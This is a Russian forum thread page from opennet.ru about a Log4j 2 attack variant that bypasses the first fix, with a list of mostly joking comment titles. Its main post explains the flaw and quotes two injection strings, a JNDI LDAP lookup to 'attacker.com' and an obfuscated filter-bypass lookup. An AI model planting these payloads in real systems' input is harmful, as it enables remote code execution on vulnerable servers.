forum.opennet.ru

"Новый вариант атаки на Log4j 2, позволяющий обойти добавленную защиту"

Форум Разговоры, обсуждение новостей
Версия для распечатки	Пред. тема \| След. тема

Исходное сообщение

[ Отслеживать ]

Присылайте удачные настройки в раздел примеров файлов конфигурации на WIKI.opennet.ru.

. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."	+1 +/–
Сообщение от Аноним (60), 15-Дек-21, 13:40
Достаточно любой подстановки внешних данных в лог, не важно как они переданы через подстановку или голой строкой. Главная проблема в этой узявимости, что Log4j сам разберёт "${..}" в выводимой строке, никаких особых подстановок для этого делать не нужно. Т.е. написал в коде "logger.info(extvar);" и можно хакнуть, если есть возможность переть в extvar что-то типа "${jndi:ldap://attacker.com/a}" или "${env:FOO:-j}ndi:${lower:L}da${lower:P}", как в примере в новости.
Ответить \| Правка \| Наверх \| Cообщить модератору

Оглавление

Новый вариант атаки на Log4j 2, позволяющий обойти добавленную защиту, opennews, 15-Дек-21, 10:33 [смотреть все]

всё что сложнее колеса, помните з ы хачу ещё плюсиков, Аноним, 15-Дек-21, 10:33 (1)
И снова вакцина не работает Символично , InuYasha, 15-Дек-21, 10:33 (2) //
- Вакцина да, не работает, в отличие от вакцин, Аноним, 15-Дек-21, 11:07 (13)
Это какой-то позор , DEF, 15-Дек-21, 10:35 (3) //
- ну это каждый местный эксперт сам решает, Аноним, 15-Дек-21, 10:36 (4)
- Диды по-другому не могли, постоянно выдумывали какие-то прикольные штуки типа , Аноним, 15-Дек-21, 10:40 (5) //
  - Диды писали и пушут на Си А джаверы - это растоманы v1 0, как и те, которые прид, Аноним, 15-Дек-21, 11:33 (25) //
    - Ой ли Традиционным языком дидов является пердл со страшными writeonly-регекспам, Аноним, 15-Дек-21, 12:10 (34)
      - Ларри слабал perl в 1987 годуИ Ларри, к сведению, лингвист Делал для себя косты, Аноним, 15-Дек-21, 13:00 (51)
        
        Что ты объясняешь этому мальчику Он только вчера прочитал магическое этот язык , Урри, 15-Дек-21, 13:24 (57)
      - Я сам из дидов, но в пердл толком даже не умею В скриптовых языках мне вообще в, Аноним, 15-Дек-21, 15:58 (84)
        
        Ну я вот в перл умею И он не страшнее остального, что создавалось в его время , Crazy Alex, 15-Дек-21, 17:22 (88)
        
        bin bash находится одесную Отца Не богохульствуй , ms is piace of s, 15-Дек-21, 20:18 (97)
        
        Ошибка 1, 20 ожидалось предлог местоположения и направление после находится B, ммнюмнюмус, 16-Дек-21, 12:04 (112)
        
        Тоже скучаю, для скриптов удобнее питона, гораздо более читаемо чем баш, довольн, keydon, 17-Дек-21, 18:50 (118)
    - Целевая аудитория java была - для кого С слишком сложно Можно сканы журнало, Аноним, 15-Дек-21, 13:04 (52)
      - Sun же, или уже забыли , АнонимГоним, 15-Дек-21, 13:50 (62)
        
        Ооо, даааа Сам читал интервью с МакНили, которое кто-то вывесил на доске объя, YetAnotherOnanym, 15-Дек-21, 14:56 (74)
        Ох ты ж Да, слиплись в памяти в одно , Аноним, 15-Дек-21, 22:53 (108)
        
        просто памяти не хватило, Аноним, 16-Дек-21, 17:54 (114)
      - прямо как сейчас растаманы , примерно_36_скотинок, 15-Дек-21, 13:59 (64)
      - Эм, и что в нём сложного ЯП ВУ же Под вопросом только читабельность кода из по, Аноним, 15-Дек-21, 14:59 (75)
        
        Метапрограммирование в целом и шаблоны в частности Множественное наследование кл, DeadMustdie, 15-Дек-21, 19:30 (94)
      - Один известный персонаж с усиками тоже имел привычку смотреть на некоторых как н, ms is piece of s, 15-Дек-21, 20:26 (99)
    - От которых жабисты и научились в format vuln Догнали и перегнали, акселерация , Аноним, 23-Дек-21, 12:01 (123)
  - Э нет, в log4j 1 x этого не было , Mike Lee, 15-Дек-21, 11:47 (26)
  - Благодаря такому формату IP до сих пор нет Великого Российского Фаервола, потому, Аноним, 15-Дек-21, 14:08 (66) //
    - Зато есть великий американский файрволл, и вот что с ним делать не знает никто , X86, 15-Дек-21, 17:53 (89)
      - Тут несколько опечаток в слове китайский , Аноним, 23-Дек-21, 12:02 (124)
- Не, просто починили не коренную проблему, а залатали именно ту дырку на которую , Kuromi, 15-Дек-21, 18:20 (90)
Надоели Log4j2 как сам, так и опасный контекст из vulnerability issue, испол, Аноним, 15-Дек-21, 10:43 (7) //
- Как соотносится использует полтора программиста и подтверждённое проявление уя, Аноним, 15-Дек-21, 10:55 (9) //
  - Фактом наличия в зависимостях проектов То есть, никак, по факту , Аноним, 15-Дек-21, 11:01 (11) //
    - в нормальном коде не выводятся параметры приходящие от пользователя в лог, плюс , полураспад, 15-Дек-21, 11:05 (12)
      - Выходит нормальный по вашим представлениям код в корпоративной среде не встреч, Аноним, 15-Дек-21, 11:11 (14)
        
        А ведь он прав , Аноньимъ, 15-Дек-21, 18:43 (93)
      - Скажите это тем, кто пишет в лог значение User Agent, X-Forward-For и прочих заг, Аноним, 15-Дек-21, 11:20 (18)
      - Это почему Вот вызвали функцию с какими-то параметрами Функция проверила парам, Фняк, 15-Дек-21, 11:55 (28)
      - точно, нормальный код логает в лог только ok и error Предоставляя гадать, что и, пох., 15-Дек-21, 11:58 (30)
      - Проблема не в том что значения от пользователя выводятся в лог, проблема в том ч, quantic, 15-Дек-21, 15:06 (76)
      - врать не надо навскидку apache выводит referer и user-agent оба от пользовател, john_erohin, 15-Дек-21, 20:28 (100)
      - Только эксперты с opennet знают как правильно писать код Жаль что почему-то не , Аноним, 15-Дек-21, 20:45 (102)
    - Это компании которые _сами_ подтвердили проявление уязвимости Log4j в своих прод, Аноним, 15-Дек-21, 11:22 (20)
      - 1 Далеко не все делают бесконтрольную подстановку данных, принятых от пользоват, Аноним, 15-Дек-21, 11:58 (31)
        
        А как надо правильно логировать http запрос от пользователя , Аноним, 15-Дек-21, 12:36 (40)
        
        Любым способом, не подразумевающим подстановку поля, полученного от пользователя, Аноним, 15-Дек-21, 12:45 (42)
        
        А если уже в полученном от пользователя поле , Урри, 15-Дек-21, 12:56 (48)
        
        msg replace , Ну, или, не используйте log4j2 , Аноним, 15-Дек-21, 13:05 (53)
        
        Вы лучше не используйте replace Ибо 7B, Аноним, 15-Дек-21, 13:17 (54)
        
        7B тоже log4j2 интерпретирует , Аноним, 15-Дек-21, 14:38 (70)
        
        Вот, самое правильное предложение Тянуть в рот васянские поделки - зло Тем боле, Онаним, 16-Дек-21, 09:10 (110)
        
        утверждая, что их дерьмо надо было покрыть глазурью, посахарить и вот-тогда-то п, примерно_36_скотинок, 15-Дек-21, 14:02 (65)
        Если я подставлю допустим объект, содержащий тело и мапу заголовков - это нормал, Аноним, 15-Дек-21, 14:51 (73)
        
        Пример из оригинала - https www lunasec io docs blog log4j-zero-day example-v, Аноним, 15-Дек-21, 18:33 (92)
        
        Дословно, с предварительным обеззараживанием, обесклычиванием, убеганием и прочи, YetAnotherOnanym, 15-Дек-21, 15:07 (77)
        
        Подскажите, как правильно обезораживать и обесклычивать в java , Аноним, 15-Дек-21, 21:39 (105)
        
        С этим обращайтесь на стаковерфлоу , YetAnotherOnanym, 16-Дек-21, 15:43 (113)
        
        Что же ты пишешь что нужно обесклычивать если сам не знаешь как это делать , Аноним, 19-Дек-21, 10:07 (122)
        
        Достаточно любой подстановки внешних данных в лог, не важно как они переданы чер , Аноним, 15-Дек-21, 13:40 (60)
        
        Как хорошо, что ничего кроме slf4j logback у нас не используется , Аноним, 15-Дек-21, 14:46 (72)
  - Причем жопа в том что это как раз то о чем многажды говорили большевики - пытаяс, пох., 15-Дек-21, 11:56 (29) //
    - просто системные либы могут быть разные А модно молодежным програмистам хочется, макпыф, 15-Дек-21, 14:21 (69)
У уязвимости есть уже подходящее имя Предлагаю Log4jopa , Аноним, 15-Дек-21, 11:01 (10) //
- Log4calypse же, Аноним, 15-Дек-21, 11:15 (16)
- log4jShell, Анимус, 15-Дек-21, 11:30 (23)
- Log4uckup, Аноним, 15-Дек-21, 13:20 (56)
- Смотреть бесплатно и без регистрации Amateurs Log4Codeshot compilation, Омномном2, 15-Дек-21, 13:25 (58)
Где же тысячи глаз попенсорса которые должны находить каждую уазвимость за на, Аноним, 15-Дек-21, 11:13 (15) //
- Ну так вот и нашли , eugener, 15-Дек-21, 11:19 (17) //
  - находить и не пущать в релиз, Аноним, 15-Дек-21, 11:21 (19) //
    - Э, а вот так мы не договаривались , тысячегласс, 15-Дек-21, 11:22 (21)
    - Тогда это считалось фичей Круто же, лукапить строчки из лога А эти хакеры всё , eugener, 15-Дек-21, 11:22 (22)
      - Старая история про солонки, да , Урри, 15-Дек-21, 12:58 (49)
    - Про релиз договора не было Было только про то что нашли , Аноним, 15-Дек-21, 12:09 (33)
  - Вроде нашёл инженер из Алибабы, в процессе сопровождения внутренностей алибабовс, DeadMustdie, 15-Дек-21, 19:38 (96)
Простое решение уязвимости в любой версии - отказ от JNDI в библиотеке log4j-cor, Анатолий, 15-Дек-21, 12:17 (35) //
- ща погодь, я на продакшоне сразу Скинь плз на почту этот jar с удаленным классо, Аноним, 15-Дек-21, 12:21 (36) //
  - у меня старый log4j версии 2 4переход на 2 15 0 выл связан с несколькими несовме, Анатолий, 15-Дек-21, 12:46 (43)
  - На, лови log4j-core-2 4 2 jar exeКороче, это пофикшеный логфорджи, плюс он авто, ms is piece of s, 15-Дек-21, 20:57 (104) //
    - срочно переделай распространять нужно в виде даунлоадера правильной, патченной, тигар.логиниться.лень, 17-Дек-21, 11:58 (117)
А я говорил - не ходите дети в африку гулятьЖаба - проприетарное зло, Аноним12345, 15-Дек-21, 12:48 (44) //
- Есть альтернатива , Аноним, 15-Дек-21, 12:51 (45) //
  - C , Аноним, 15-Дек-21, 13:58 (63) //
    - абсолютно не проприетарный без 99 контроля одной коммерческой компании Сам, Аноним, 15-Дек-21, 14:40 (71)
    - О, про него ещё кто-то помнит О_о, Аноним, 15-Дек-21, 15:29 (82)
  - Есть , Аноним, 15-Дек-21, 20:38 (101)
- log4j вполне себе фри- и опенсорсный , Урри, 15-Дек-21, 12:58 (50)
А ведь Java безопасно работает с памятью, а всё равно дыра как такое может быть , Аноним, 15-Дек-21, 14:19 (67) //
- При чем здесь память, это ошибка поведения - eval произвольных данных , cheater, 15-Дек-21, 15:14 (79) //
  - И это - будущее раста , Аноним, 15-Дек-21, 15:28 (81) //
    - Это прошлое раста В C этой проблемы уже давным давно нет , Аноним, 15-Дек-21, 17:07 (87)
      - Более того добавлю В С все эти проблемы которые вы тут вешаете на С были реше, Аноним, 15-Дек-21, 21:44 (106)
        
        Ну да - если плюсы не юзать - плюсопроблем и нет Л-логика Для дюбого Ёзыга, _, 16-Дек-21, 19:41 (116)
- Этого не может быть Это заговор, как китайский короновирус , gogo, 15-Дек-21, 15:46 (83)
- А ведь люди сперва распарсевают смысл написанного, а всё равно задают глупые воп, ms is piece of s, 15-Дек-21, 20:50 (103) //
  - Да ладно тебе Ну кто таким заниматься будет , Аноним, 16-Дек-21, 06:39 (109)
Ну всё, сейчас будут вместо того, чтобы eval убрать, городить кучу валидаций, и , Онаним, 15-Дек-21, 20:23 (98) //
- В любой валидации будет дыра, ведь код пишут прогосеки с растаманоподобными мозг, Аноним, 18-Дек-21, 02:56 (120) //
  - Это называется за смузи проeval и зияющую дырину , Онаним, 18-Дек-21, 19:00 (121)
А ведь это даже не сишечка с переполнением буфера А вполне кошерный менеджмент , anonymous, 15-Дек-21, 22:48 (107) //
- Да как обычно, дело не в бобине , Онаним, 16-Дек-21, 09:12 (111) //
  - сейчас где то умер котё W ржавчик Как же так то ржавчина нэ спасэ как, _, 16-Дек-21, 19:39 (115) //
    - Не только не спасает, а даже облегчает написание троянов , Аноним, 18-Дек-21, 02:54 (119)

Форумы | Темы | Пред. тема | След. тема

Партнёры:

Хостинг:

Закладки на сайте
Проследить за страницей

Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру